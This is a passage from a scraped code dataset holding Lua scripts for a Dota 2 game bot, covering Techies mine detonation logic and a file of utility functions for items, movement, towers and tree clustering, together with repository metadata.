"text": "require(GetScriptDirectory()..\"/UtilityData\");\nrequire(GetScriptDirectory()..\"/UtilityFunctions\");\n\nlocal npcBot = GetBot();\nlocal botTeam = GetTeam();\nnpcBot.other_mode = nil\n\n-- Keep a reference to each mine\nlocal remoteMines = {};\nlocal proxMines = {};\n\nnpcBot.canAttackTower = true\n\n-- Detonate only enough Remote Mines to kill an enemy player and no more\nfunction MinionThink(hMinionUnit)\n\tif hMinionUnit ~= nil then\n\t\tlocal unitName = hMinionUnit:GetUnitName();\n\t\tif unitName == \"npc_dota_techies_remote_mine\" then\n\t\t\tlocal remoteDetonate = hMinionUnit:GetAbilityByName(\"techies_remote_mines_self_detonate\");\n\t\t\tlocal remoteLevel = npcBot:GetAbilityByName(\"techies_remote_mines\"):GetLevel();\n\t\t\tlocal nRadius = remoteDetonate:GetSpecialValueInt(\"radius\");\n\t\t\tlocal numHeroes = 0;\n\t\t\tlocal nearbyHeroes = hMinionUnit:GetNearbyHeroes(nRadius, true, BOT_MODE_NONE);\n\t\t\tlocal nearbyCreeps = hMinionUnit:GetNearbyCreeps(nRadius, true);\n\t\t\t\n\t\t\tremoteMines = _G.getAllUnitsByName(\"npc_dota_techies_remote_mine\", UNIT_LIST_ALLIES);\n\n\t\t\t-- Get all nearby enemies\n\t\t\tif table.getn(nearbyHeroes) then\n \t\t\tfor _, hero in pairs(nearbyHeroes) do\n \t\t\t\tif hero:IsHero() then\n \t\t\t\t\thMinionUnit:SetTarget(hero)\n \t\t\t\t\tlocal minesDetonated = detonateMines(remoteLevel, hero, remoteDetonate, npcBot);\n \t\t\t\t\tnumHeroes = numHeroes + 1;\n \t\t\t\tend\n \t\t\tend\n\t\t\telseif table.getn(nearbyCreeps) > 3 then\n\t\t\t\tlocal nearbyMines = {}\n\t\t\t\tfor m = 1, table.getn(remoteMines) do\n\t\t\t\t\tlocal mine = remoteMines[m]\n\t\t\t\t\tlocal creep = nearbyCreeps[1]\n\t\t\t\t\tlocal dist = GetUnitToUnitDistance(mine, creep)\n\t\t\t\t\t\n\t\t\t\t\tif dist < nRadius then\n\t\t\t\t\t\ttable.insert(nearbyMines, mine)\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tnearbyMines[1]:Action_UseAbility(remoteDetonate)\n\t\t\tend\n\t\telseif unitName == \"npc_dota_techies_land_mine\" then\n\t\t\tproxMines = _G.getAllUnitsByName(\"npc_dota_techies_land_mine\", UNIT_LIST_ALLIES);\n\t\tend\n\tend\n\t-- Add to total proximity and remote mines currently active\n\t_G.total_prox = #proxMines;\n\t_G.total_remotes = #remoteMines;\nend\n\nfunction minesToKillEnemy(remoteLevel, enemyBot, bot)\n\tlocal health = enemyBot:GetHealth();\n\tlocal mineDmg = 0;\n\tlocal modifier = 0;\n\tlocal enemyResist = enemyBot:GetMagicResist(); -- this is a percentage\n\t-- print(\"Enemy Resistance:\", enemyResist);\n\tif bot:HasModifier(\"modifier_item_ultimate_scepter\") or\n\t bot:HasModifier(\"modifier_item_ultimate_scepter_consumed\") then\n\t\tmodifier = 150;\n\tend\n\tif remoteLevel == 1 then\n\t\tmineDmg = 300 + modifier;\n\telseif remoteLevel == 2 then\n\t\tmineDmg = 450 + modifier;\n\telse\n\t\tmineDmg = 750 + modifier;\n\tend\n\tmineDmg = mineDmg - (mineDmg * enemyResist);\n\tlocal numMines = health/mineDmg;\n\n\t-- print(\"Number of MINES to kill enemy:\", health, mineDmg, number, remoteLevel, math.ceil(number))\n\n\treturn math.ceil(numMines);\nend\n\n-- See if mines have been detonated, then remove them\n-- Also check if the enemy is someone else and update\nfunction analyzeMines(enemyBot)\n\tfor i, mine in pairs(remoteMines) do\n\t\tif mine:IsNull() then\n\t\t\ttable.remove(remoteMines, i)\n\t\t\t-- print(\"mine removed, already dead\");\n\t\telse\n\t\t\tlocal target = mine:GetTarget()\n\t\t\tif target ~= enemyBot then\n\t\t\t\t-- print(\"Target has moved out of range... 
removing target from mine\")\n\t\t\t\tenemyBot:SetTarget(nil)\n\t\t\tend\t\n\t\tend\n\tend\nend\n\n-- Analyze all mines with the same target and detonate enough\n-- mines to kill the enemy, and no more\nfunction detonateMines(remoteLevel, enemyBot, ability, bot)\n\tanalyzeMines(enemyBot)\n\tlocal numMines = minesToKillEnemy(remoteLevel, enemyBot, bot)\n\tlocal minesDetonated = 0\n\tlocal totalMines = 0\n\tfor _, mine in pairs(remoteMines) do\n\t\tif mine:GetTarget() == enemyBot then\n\t\t\ttotalMines = totalMines + 1\n\t\tend\n\tend\n\tif totalMines >= numMines then\n\t\tfor _, mine in pairs(remoteMines) do\n\t\t\tlocal target = mine:GetTarget()\n\n\t\t\tif target == enemyBot then\n\t\t\t\tmine:Action_UseAbility(ability)\n\t\t\t\tminesDetonated = minesDetonated + 1\n\n\t\t\t\tif minesDetonated == numMines then\n\t\t\t\t\treturn minesDetonated\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend\nend\n\nfunction printAllCreepAttackers(creepList)\n\tif creepList ~= nil then\n\t\tfor _, creep in pairs(creepList) do\n\t\t\tif creep ~= nil then\n\t\t\t\tfor _, creepTable in pairs(creep) do\n\t\t\t\t\tif creepTable ~= nil then\n\t\t\t\t\t\tfor i, creepData in ipairs(creepTable) do\n\t\t\t\t\t\t\tif i == 0 then\n\t\t\t\t\t\t\t\tprint(\"allied creep:\", creepData:GetUnitName())\n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t\tprint(\" attacker\", creepData:GetUnitName())\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\tend\n\t\t\t\t\t\tprint(\" \")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\telse\n\t\tprint(\"No Attackers\")\n\tend\nend\n"
},
{
"alpha_fraction": 0.6235190033912659,
"alphanum_fraction": 0.6436261534690857,
"avg_line_length": 27.292072296142578,
"blob_id": "886c5f48768512ed839148e7c7eb69df49d34a09",
"content_id": "866511d3e6e691ee2fbdd3a4a7172d3dc31d6a66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 20341,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 719,
"path": "/UtilityFunctions.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\");\n\nfunction fillTalentTable(bot)\n\tlocal skills = {};\n\tfor i = 0, 23 \n\tdo\n\t\tlocal ability = bot:GetAbilityInSlot(i);\n\t\tif ability ~= nil and ability:IsTalent() then\n\t\t\ttable.insert(skills, ability:GetName());\n\t\tend\n\tend\n\treturn skills\nend\n\n-- Gets a list of units of a specific type,\n-- then narrows the list down to only ones with a specific name\nfunction getAllUnitsByName(unitName, unitType)\n\tlocal units = {};\n\tfor _, unit in pairs(GetUnitList(unitType)) do\n\t\tif unit:GetUnitName() == unitName then\n\t\t\ttable.insert(units, unit);\n\t\tend\n\tend\n\n\treturn units;\nend\n\nlocal currentAction = 0;\nlocal arcaneBoots = nil;\nlocal pointBooster = nil;\nlocal droppedPB = false;\nlocal droppedAB = false;\n\n-- Use Soul Ring, after dropping Arcane Boots and Point Booster if owned\n-- Returns true if at least Soul Ring was used\nfunction useSoulRing(bot)\n\tlocal SoulRing = nil;\n\tlocal queue = bot:NumQueuedActions();\n\tlocal action = bot:GetCurrentActionType();\n\n\tfor i = 0, 5, 1 do\n\t\tlocal item = bot:GetItemInSlot(i);\n\t\tif item ~= nil then\n\t\t\tlocal itemName = item:GetName();\n\t\t\tif itemName == \"item_soul_ring\" then\n\t\t\t\tSoulRing = item;\n\t\t\telseif itemName == \"item_arcane_boots\" then\n\t\t\t\tarcaneBoots = item;\n\t\t\t\t-- hasArcane = true;\n\t\t\telseif itemName == \"item_point_booster\" then\n\t\t\t\tpointBooster = item;\n\t\t\t\t-- hasPB = true;\n\t\t\tend\n\t\tend\n\tend\n\n\tif SoulRing ~= nil and SoulRing:IsFullyCastable() then\n\t\tbot:ActionPush_UseAbility(SoulRing);\n\telseif arcaneBoots ~= nil and arcaneBoots:IsFullyCastable() then\n\t\tbot:ActionPush_UseAbility(arcaneBoots);\n\tend\n\n\t-- if SoulRing == nil then\n\t-- \treturn false;\n\t-- elseif arcaneBoots == nil and pointBooster == nil and SoulRing:IsFullyCastable() and not usedRing then\n\t-- \tprint(\"USING ITEM soul ring, Arcane Boots: \"..((arcaneBoots == nil) and \"false\" or \"true\")..\" Point Booster: \"..((pointBooster == nil) and \"false\" or \"true\"));\n\t-- \tbot:ActionPush_UseAbility(SoulRing);\n\t-- \tusedRing = true;\n\t-- elseif SoulRing:IsFullyCastable() or usedRing then\n\t-- \t-------------------------------------------------------------------------\n\t-- \t-- Bot currently drops arcane boots and point booster as intended, \n\t-- \t-- but does not pick them back up after using Soul Ring\n\t-- \t-------------------------------------------------------------------------\n\n\t-- \tlocal botLoc = bot:GetLocation();\n\t-- \t-- if currentAction == 0 and queue == 0 then\n\t-- \t-- \tif arcaneBoots ~= nil then\n\t-- \t-- \t\tbot:ActionQueue_DropItem(arcaneBoots, botLoc + RandomVector(10));\n\t-- \t-- \t\tprint(\"ARCANE BOOTS DROPPED!\");\n\t-- \t-- \t\tdroppedAB = true;\n\t-- \t-- \tend\n\t-- \t-- \tcurrentAction = 1;\n\t-- \t-- elseif currentAction == 1 and queue == 0 then\n\t-- \t-- \tif pointBooster ~= nil then\n\t-- \t-- \t\tbot:ActionQueue_DropItem(pointBooster, botLoc + RandomVector(20));\n\t-- \t-- \t\tprint(\"POINT BOOSTER DROPPED!\");\n\t-- \t-- \t\tdroppedPB = true;\n\t-- \t-- \tend\n\t-- \t-- \tcurrentAction = 2;\n\t-- \t-- else\n\t-- \t-- if currentAction == 2 and queue == 0 then\n\t-- \t\tbot:ActionPush_UseAbility(SoulRing);\n\t-- \t\t-- currentAction = 3;\n\t-- \t-- elseif currentAction == 3 and queue == 0 then\n\t-- \t-- \tif droppedAB then\n\t-- \t-- \t\tif action ~= _G.actions[\"pick_item\"] then\n\t-- \t-- \t\t\tbot:ActionQueue_PickUpItem(arcaneBoots);\n\t-- \t-- \t\t\tdroppedAB = 
false;\n\t-- \t-- \t\tend\n\t-- \t-- \tend\n\t-- \t-- \tcurrentAction = 4;\n\t-- \t-- elseif currentAction == 4 and queue == 0 then\n\t-- \t-- \tif droppedPB then\n\t-- \t-- \t\tif action ~= _G.actions[\"pick_item\"] then\n\t-- \t-- \t\t\tbot:ActionQueue_PickUpItem(pointBooster);\n\t-- \t-- \t\t\tdroppedPB = false;\n\t-- \t-- \t\tend\n\t-- \t-- \tend\n\t-- \t-- \tcurrentAction = 5;\n\t-- \t-- end\n\t-- end\n\t-- if currentAction == 5 then\n\t-- \treturn true;\n\t-- end\nend\n\nfunction hasItem(itemToFind, bot)\n\titemSlot = bot:FindItemSlot(itemToFind);\n\tif itemSlot >= 0 then\n\t\treturn true;\n\tend\n\treturn false;\nend\n\n-- Find an item in the bot's inventory and use it if it's\n-- able to be used or hasn't already been used.\n-- Returns false if the item was not able to be used\nfunction useItem(bot, item_name, target, modifier)\n\tif bot:HasModifier(modifier) then\n\t\treturn false;\n\telse\n\t\tlocal item = nil;\n\t\tfor i = 0, 5, 1 do\n\t\t\tlocal itemSlot = bot:GetItemInSlot(i);\n\t\t\tif itemSlot ~= nil then\n\t\t\t\tlocal itemName = itemSlot:GetName();\n\t\t\t\tif itemName == item_name then\n\t\t\t\t\titem = itemSlot;\n\t\t\t\t\tbreak;\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tif item ~= nil then\n\t\t\tif target ~= nil then\n\t\t\t\tif item_name == \"item_tango\" then\n\t\t\t\t\tbot:ActionPush_UseAbilityOnTree(item, bot);\n\t\t\t\telse\n\t\t\t\t\tbot:ActionPush_UseAbilityOnEntity(item, bot);\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tbot:ActionPush_UseAbility(item);\n\t\t\tend\n\t\t\treturn true;\n\t\tend\n\t\treturn false;\n\tend\nend\n\n-- Get's the distance between two points on the map\nfunction getDistanceBetweenTwoPoints(vector1, vector2)\n\tx1 = vector1[1];\n\ty1 = vector1[2];\n\tx2 = vector2[1];\n\ty2 = vector2[2];\n\n\txd = x1-x2;\n\tyd = y1-y2\n\treturn math.sqrt((xd * xd) + (yd * yd));\nend\n\n-- Get a location farther away from a point\n-- Used to get a location to move away from an enemy\n-- Since there may be obstacles in the way, best to use a very far distance\n-- and cancel move when needed\n-- TODO: be able to consider more than one enemy and find the optimal fallback location\nfunction getRetreatLocation(botLoc, enemyLoc, distance)\n\t-- local currDistance = getDistanceBetweenTwoPoints(vector1, vector2);\n\tlocal slope = (botLoc[2] - enemyLoc[2]) / (botLoc[1] - enemyLoc[1])\n\tlocal theta = math.atan(slope);\n\tlocal newX = botLoc[1] + distance * (math.cos(theta));\n\tlocal newY = botLoc[2] + distance * (math.sin(theta));\n\n\tif newX > 8200 then\n\t\tnewX = 8200;\n\telseif newX < -8200 then\n\t\tnewX = -8200;\n\tend\n\n\tif newY > 8200 then\n\t\tnewY = 8200;\n\telseif newY < -8200 then\n\t\tnewY = -8200;\n\tend\n\t\n\treturn Vector(newX, newY);\nend\n\n-- Check where the bot is within the lane and return a fallback location\n-- in the opposite direction from the enemy\nfunction getFallbackInLane(lane, botLoc, fallbackDist)\n\tif lane ~= LANE_MID then\n\t\tif botTeam == TEAM_RADIANT then\n\t\t\tif lane == LANE_TOP then\n\t\t\t\tlocal dist1 = PointToLineDistance(_G.top_lane[1], _G.top_lane[2], botLoc);\n\t\t\t\tlocal dist2 = PointToLineDistance(_G.top_lane[2], _G.top_lane[3], botLoc);\n\n\t\t\t\tif dist1 ~= nil and dist2 ~= nil then\n\t\t\t\t\tif dist1[1] < dist2[1] then\n\t\t\t\t\t\treturn (botLoc - Vector(0, fallbackDist));\n\t\t\t\t\telse\n\t\t\t\t\t\treturn (botLoc - Vector(fallbackDist, 0));\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tlocal dist1 = PointToLineDistance(_G.bot_lane[1], _G.bot_lane[2], botLoc);\n\t\t\t\tlocal dist2 = 
PointToLineDistance(_G.bot_lane[2], _G.bot_lane[3], botLoc);\n\n\t\t\t\tif dist1 ~= nil and dist2 ~= nil then\n\t\t\t\t\tif dist1.distance < dist2.distance then\n\t\t\t\t\t\treturn (botLoc - Vector(fallbackDist, 0));\n\t\t\t\t\telse\n\t\t\t\t\t\treturn (botLoc - Vector(0, fallbackDist));\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\telse\n\t\t\tif lane == LANE_TOP then\n\t\t\t\tlocal dist1 = PointToLineDistance(_G.top_lane[3], _G.top_lane[2], botLoc);\n\t\t\t\tlocal dist2 = PointToLineDistance(_G.top_lane[2], _G.top_lane[1], botLoc);\n\n\t\t\t\tprint(\"Fallback1: \"..dist1.closest_point[1]..\",\"..dist1.closest_point[2]);\n print(\"Fallback2: \"..dist2.closest_point[1]..\",\"..dist2.closest_point[2]);\n\n if dist1 == nil or dist2 == nil then\n if dist1 == nil then\n return (botLoc + Vector(0, fallbackDist));\n else\n return (botLoc + Vector(fallbackDist, 0));\n end\n end\n\n\t\t\t\tif dist1 ~= nil and dist2 ~= nil then\n\t\t\t\t\tif dist1.distance < dist2.distance then\n local fallbackPoint = botLoc + Vector(0, fallbackDist);\n\t\t\t\t\t\treturn fallbackPoint;\n\t\t\t\t\telse\n local fallbackPoint = botLoc + Vector(fallbackDist, 0);\n\t\t\t\t\t\treturn fallbackPoint;\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tlocal dist1 = PointToLineDistance(_G.bot_lane[3], _G.bot_lane[2], botLoc);\n\t\t\t\tlocal dist2 = PointToLineDistance(_G.bot_lane[2], _G.bot_lane[1], botLoc);\n\n\t\t\t\tif dist1 ~= nil and dist2 ~= nil then\n\t\t\t\t\tif dist1.distance < dist2.distance then\n\t\t\t\t\t\treturn (botLoc + Vector(fallbackDist, 0));\n\t\t\t\t\telse\n\t\t\t\t\t\treturn (botLoc + Vector(0, fallbackDist));\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\telse\n\t\treturn (botLoc - Vector(fallbackDist / 2, fallbackDist / 2));\n\tend\nend\n\n-- Returns all towers within a lane that are still alive\n-- The two towers at base are referenced by LANE_NONE\n-- if lane == 5, then all living towers will be returned\nfunction getAllTowersInLane(lane, team)\n\tlocal towersStatus = {};\n\tif lane == LANE_NONE or lane == 5 then\n\t\tT1 = GetTower(team, _G.towers[10]);\n\t\tT2 = GetTower(team, _G.towers[11]);\n\t\tif T1 ~= nil then table.insert(towersStatus, T1) end;\n\t\tif T2 ~= nil then table.insert(towersStatus, T2) end;\n\telseif lane == LANE_TOP or lane == 5 then\n\t\tT1 = GetTower(team, _G.towers[1]);\n\t\tT2 = GetTower(team, _G.towers[4]);\n\t\tT3 = GetTower(team, _G.towers[7]);\n\t\tif T1 ~= nil then table.insert(towersStatus, T1) end;\n\t\tif T2 ~= nil then table.insert(towersStatus, T2) end;\n\t\tif T3 ~= nil then table.insert(towersStatus, T3) end;\n\telseif lane == LANE_MID or lane == 5 then\n\t\tT1 = GetTower(team, _G.towers[2]);\n\t\tT2 = GetTower(team, _G.towers[5]);\n\t\tT3 = GetTower(team, _G.towers[8]);\n\t\tif T1 ~= nil then table.insert(towersStatus, T1) end;\n\t\tif T2 ~= nil then table.insert(towersStatus, T2) end;\n\t\tif T3 ~= nil then table.insert(towersStatus, T3) end;\n\telseif lane == LANE_BOT or lane == 5 then\n\t\tT1 = GetTower(team, _G.towers[3]);\n\t\tT2 = GetTower(team, _G.towers[6]);\n\t\tT3 = GetTower(team, _G.towers[9]);\n\t\tif T1 ~= nil then table.insert(towersStatus, T1) end;\n\t\tif T2 ~= nil then table.insert(towersStatus, T2) end;\n\t\tif T3 ~= nil then table.insert(towersStatus, T3) end;\n\tend\n\treturn towersStatus;\nend\n\n-- Returns the team's specific object\nfunction getTeamObject(team, rad, dir)\n\tif team == _G.teams[1] then\n\t\treturn rad;\n\telse\n\t\treturn dir;\n\tend\nend\n\n-- Checks if a bot is stuck and not moving\n-- Use this function for sequences where 
a \n-- bot can possibly stop moving for no reason\nfunction isStuck(locArray, currentLoc)\n\t-- Bot's been stuck long enough\n\tif table.getn(locArray) >= 15 then\n\t\tlocArray = {};\n\t\treturn true;\n\telse\n\t\t-- Since all entries are the same, \n\t\t-- check only first element\n\t\tif table.getn(locArray) > 0 then\n\t\t\tif locArray[1] ~= currentLoc then\n\t\t\t\tlocArray = {};\n\t\t\telse\n\t\t\t\ttable.insert(locArray, currentLoc);\n\t\t\tend\n\t\tend\n\tend\n\treturn false;\nend\n\n-- Returns the unit that has the lowest amount of HP in the group\nfunction getWeakestEnemyUnit(unitTable)\n\tlocal currHP = 10000;\n\tlocal lowestUnit = nil;\n\n\tfor _, unit in pairs(unitTable) do\n\t\tlocal unitHP = unit:GetHealth();\n\t\tif unitHP < currHP then\n\t\t\tcurrHP = unitHP;\n\t\t\tlowestUnit = unit;\n\t\tend\n\tend\n\n\treturn lowestUnit;\nend\n\n-- Walks back from the target toward botLoc until the point is\n-- within distFromPoint of botLoc\nfunction getLocationFromPoint(botLoc, targetLoc, distFromPoint)\n\tlocal newX = targetLoc[1];\n\tlocal newY = targetLoc[2];\n\tlocal newLoc = Vector(newX, newY);\n\n\twhile true do\n\t\tlocal dist = getDistanceBetweenTwoPoints(botLoc, newLoc);\n\t\tif math.abs(dist) <= distFromPoint then\n\t\t\treturn newLoc\n\t\telse\n\t\t\tnewX = (newLoc[1] + botLoc[1])/2;\n\t\t\tnewY = (newLoc[2] + botLoc[2])/2;\n\t\t\tnewLoc = Vector(newX, newY);\n\t\tend\n\tend\nend\n\n-- Returns a list of all towers HP status in the lane specified\n-- Works for either team; dead towers report 0 HP\nfunction GetTowerStatus(lane, side)\n\tlocal laneTowers = {\n\t\ttop = {TOWER_TOP_1, TOWER_TOP_2, TOWER_TOP_3},\n\t\tmid = {TOWER_MID_1, TOWER_MID_2, TOWER_MID_3},\n\t\tbot = {TOWER_BOT_1, TOWER_BOT_2, TOWER_BOT_3},\n\t\tbase = {TOWER_BASE_1, TOWER_BASE_2}\n\t}\n\tlocal towerIDs = laneTowers[lane] or laneTowers[\"base\"]\n\tlocal status = {}\n\tfor i, towerID in ipairs(towerIDs) do\n\t\tlocal tower = GetTower(side, towerID)\n\t\tif tower ~= nil then\n\t\t\tstatus[i] = tower:GetHealth()\n\t\telse\n\t\t\tstatus[i] = 0\n\t\tend\n\tend\n\treturn status\nend\n\n-- Returns the lane's front location and amount as a list\nfunction GetLaneCreepStatus(lane, side)\n\tlocal frontLocation = GetLaneFrontLocation(side, lane, 50)\n\tlocal frontAmount = GetLaneFrontAmount(side, lane, true)\n\t\n\treturn {frontLocation, frontAmount}\nend\n\n-- Gets the vector location of a point p percentage between you and the target\nfunction getVectorBetweenTargetPercentage(you, target, p)\n\tlocal youLoc = you:GetLocation()\n\tlocal youX = youLoc[1]\n\tlocal youY = youLoc[2]\n\t\n\tlocal targetLoc = target:GetLocation()\n\tlocal targetX = targetLoc[1]\n\tlocal targetY = targetLoc[2]\n\n\t-- Linear interpolation between the two positions\n\tlocal locX = youX + (targetX - youX)*p\n\tlocal locY = youY + (targetY - youY)*p\n\t\n\treturn Vector(locX, locY, 0)\nend\n\n-- Gets the vector location of the point at distance d from you toward the target\nfunction getVectorBetweenTargetDistance(you, target, d)\n\tlocal dist = GetUnitToUnitDistance(you, target)\n\tif dist == 0 then\n\t\treturn you:GetLocation()\n\tend\n\t\n\treturn getVectorBetweenTargetPercentage(you, target, d/dist)\nend\n\n-- Returns a list of the point locations of each tree ID\nfunction getTreeLocations(trees)\n\tlocal treeLocs = {} \n\tfor _, tree in ipairs(trees) do\n\t\tlocal loc = GetTreeLocation(tree)\n\t\ttable.insert(treeLocs, loc)\n\tend\n\t\n\treturn treeLocs\nend\n\n-- Clusters points (trees) with a defined minimum distance\n-- Returns a list of lists (tree clusters) of tree locations\nfunction cluster(points)\n\tlocal clusters = {}\n\t\n\twhile #points > 0 do\n\t\tlocal s = {}\n\t\tlocal loc = table.remove(points, 1)\n\t\tlocal queue = {loc}\n\t\t\n\t\twhile #queue > 0 do\n\t\t\t-- Gather every unclustered point within range of the current frontier\n\t\t\tlocal tempQueue = {}\n\t\t\tfor i = 1, #queue do\n\t\t\t\tlocal p1 = queue[i]\n\t\t\t\tfor j = 1, #points do\n\t\t\t\t\tlocal p2 = points[j]\n\t\t\t\t\tif not samePoint(p1, p2) then\n\t\t\t\t\t\tlocal dist = getDistance(p1, p2)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif dist < 200 then\n\t\t\t\t\t\t\ttable.insert(tempQueue, p2)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t\n\t\t\tfor i = 1, #queue do\n\t\t\t\tlocal p1 = queue[i]\n\t\t\t\tif not inGroup(s, p1) then\n\t\t\t\t\ttable.insert(s, p1)\n\t\t\t\tend\n\t\t\tend\n\t\t\t\n\t\t\tqueue = tempQueue;\n\t\t\t\n\t\t\t-- Remove the newly queued points from the unclustered pool\n\t\t\tfor i = 1, #tempQueue do\n\t\t\t\tlocal p1 = tempQueue[i]\n\t\t\t\tfor j = 1, #points do\n\t\t\t\t\tlocal p2 = points[j]\n\t\t\t\t\tif samePoint(p1, p2) then\n\t\t\t\t\t\ttable.remove(points, j)\n\t\t\t\t\t\tbreak\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tif table.getn(s) > 1 then\n\t\t\ttable.insert(clusters, s)\n\t\tend\n\tend\n\t\n\treturn clusters\nend\n\nfunction clusterAndGetCentroids(points)\n\tif table.getn(points) == 0 then return nil end\n\t\n\tlocal clusters = cluster(points)\n\tlocal centroids = {}\n\t\n\tfor _, group in ipairs(clusters) do\n\t\tlocal xavg = 0\n\t\tlocal yavg = 0\n\t\tfor _, point in ipairs(group) do\n\t\t\txavg = xavg + point[1]\n\t\t\tyavg = yavg + point[2]\n\t\tend\n\t\tlocal size = table.getn(group)\n\t\tlocal centroid = Vector(xavg/size, yavg/size, 0)\n\t\ttable.insert(centroids, centroid)\n\tend\n\t\n\treturn centroids\nend\n\nfunction getCentroid(points)\n\tlocal numPoints = table.getn(points)\n\tlocal x = 0\n\tlocal y = 0\n\t\n\tfor p = 1, numPoints do\n\t\tlocal point = points[p]\n\t\t\n\t\tx = x + point[1]\n\t\ty = y + point[2]\n\tend\n\t\n\treturn Vector(x/numPoints, y/numPoints, 0)\nend\n\n-- Returns the distance between two points\nfunction getDistance(p1, p2)\n\treturn math.sqrt((p1[1] - p2[1])*(p1[1] - p2[1]) + (p1[2] - p2[2])*(p1[2] - p2[2]))\nend\n\n-- Gets the coordinates of a point C X degrees from A about the point of origin B\nfunction getAnglePoint(origin, point, degrees)\n\tlocal diffX = origin[1]\n\tlocal diffY = origin[2]\n\n\tlocal creepX = point[1] - diffX\n\tlocal creepY = point[2] - diffY\n\t\n\t-- Standard 2D rotation about the origin\n\tlocal newX = creepX * math.cos(math.rad(degrees)) - creepY * math.sin(math.rad(degrees))\n\tlocal newY = creepX * math.sin(math.rad(degrees)) + creepY * math.cos(math.rad(degrees))\n\t\n\treturn Vector(newX + diffX, newY + diffY, 0)\nend\n\n-- Checks if the two points are the same point by location\nfunction samePoint(p1, p2)\n\treturn math.floor(p1[1]) == math.floor(p2[1]) and math.floor(p1[2]) == math.floor(p2[2]) \nend\n\n-- Checks if a point is already contained in a group of points\nfunction inGroup(group, point)\n\tfor i = 1, #group do\n\t\tlocal p = group[i]\n\t\tif samePoint(p, point) then\n\t\t\treturn true\n\t\tend\n\tend\n\t\n\treturn false\nend\n\nfunction getDesireString(mode)\n\tif mode == BOT_MODE_NONE then\n\t\treturn \"None\"\n\telseif mode == BOT_MODE_LANING then\n\t\treturn \"Laning\"\n\telseif mode == BOT_MODE_ATTACK then\n\t\treturn \"Attack\"\n\telseif mode == BOT_MODE_RETREAT then\n\t\treturn \"Retreat\"\n\telseif mode == BOT_MODE_SECRET_SHOP then\n\t\treturn \"Secret Shop\"\n\telseif mode == BOT_MODE_SIDE_SHOP then\n\t\treturn \"Side Shop\"\n\telseif mode == BOT_MODE_PUSH_TOWER_TOP then\n\t\treturn \"Push Top Tower\"\n\telseif mode == BOT_MODE_PUSH_TOWER_MID then\n\t\treturn \"Push Mid Tower\"\n\telseif mode == BOT_MODE_PUSH_TOWER_BOT then\n\t\treturn \"Push Bot Tower\"\n\telseif mode == BOT_MODE_DEFEND_TOWER_TOP then\n\t\treturn \"Defend Top Tower\"\n\telseif mode == BOT_MODE_DEFEND_TOWER_MID then\n\t\treturn \"Defend Mid Tower\"\n\telseif mode == BOT_MODE_DEFEND_TOWER_BOT then\n\t\treturn \"Defend Bot Tower\"\n\telseif mode == BOT_MODE_ASSEMBLE then\n\t\treturn \"Assemble\"\n\telseif mode == BOT_MODE_TEAM_ROAM then\n\t\treturn \"Team Roam\"\n\telseif mode == BOT_MODE_FARM then\n\t\treturn \"Farm\"\n\telseif mode == BOT_MODE_DEFEND_ALLY then\n\t\treturn \"Defend Ally\"\n\telseif mode == BOT_MODE_EVASIVE_MANEUVERS then\n\t\treturn \"Evasive Maneuvers\"\n\telseif mode == BOT_MODE_ROSHAN then\n\t\treturn \"Roshan\"\n\telseif mode == BOT_MODE_ITEM then\n\t\treturn \"Item\"\n\telseif mode == BOT_MODE_WARD then\n\t\treturn \"Ward\"\n\tend\nend\n\n-- Get the best target to use Hand of Midas on\nfunction getMidasTarget(npcBot)\n\tlocal creeps = npcBot:GetNearbyLaneCreeps(1600, true)\n\tlocal neutrals = npcBot:GetNearbyNeutralCreeps(1600)\n\tlocal creepsToUse = nil\n\tlocal target = nil\n\t\n\tif table.getn(creeps) > 0 then\n\t\tcreepsToUse = creeps\n\telse\n\t\tcreepsToUse = neutrals\n\tend\n\t\n\tif table.getn(creepsToUse) > 0 then\n\t\ttarget = creepsToUse[1]\n\t\t\n\t\tfor i = 2, table.getn(creepsToUse) do\n\t\t\tif target:GetMaxHealth() < creepsToUse[i]:GetMaxHealth() then\n\t\t\t\ttarget = creepsToUse[i]\n\t\t\tend\n\t\tend\n\tend\n\t\n\treturn target\nend\n\n-- Returns whether it's safe to attack a tower\nfunction isTowerSafe(npcBot, tower)\n\tlocal towerTarget = tower:GetAttackTarget()\n\tif towerTarget == nil then\n\t\treturn false\n\tend\n\tlocal targetHP = towerTarget:GetHealth()\n\tlocal targetMaxHP = towerTarget:GetMaxHealth()\n\tlocal distToTower = GetUnitToUnitDistance(npcBot, tower)\n\tlocal nearbyCreeps = tower:GetNearbyLaneCreeps(800, false)\n\t\n\tif targetHP / targetMaxHP <= 0.5 then\n\t\tif table.getn(nearbyCreeps) > 0 then\n\t\t\tlocal creepDistToTower = GetUnitToUnitDistance(nearbyCreeps[1], tower)\n\t\t\tlocal botDistToTower = GetUnitToUnitDistance(npcBot, tower)\n\t\t\t\n\t\t\tif creepDistToTower < botDistToTower then\n\t\t\t\treturn true\n\t\t\tend\n\t\telse\n\t\t\treturn false\n\t\tend\n\telse\n\t\treturn true\n\tend\n\treturn false\nend\n\n-- Returns if the item is in a main slot or not and the item itself\nfunction getItemAvailable(itemName, bot)\n\tlocal itemSlot = bot:FindItemSlot(itemName)\n\treturn (bot:GetItemSlotType(itemSlot) == ITEM_SLOT_TYPE_MAIN), bot:GetItemInSlot(itemSlot)"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.760869562625885,
"avg_line_length": 22.25,
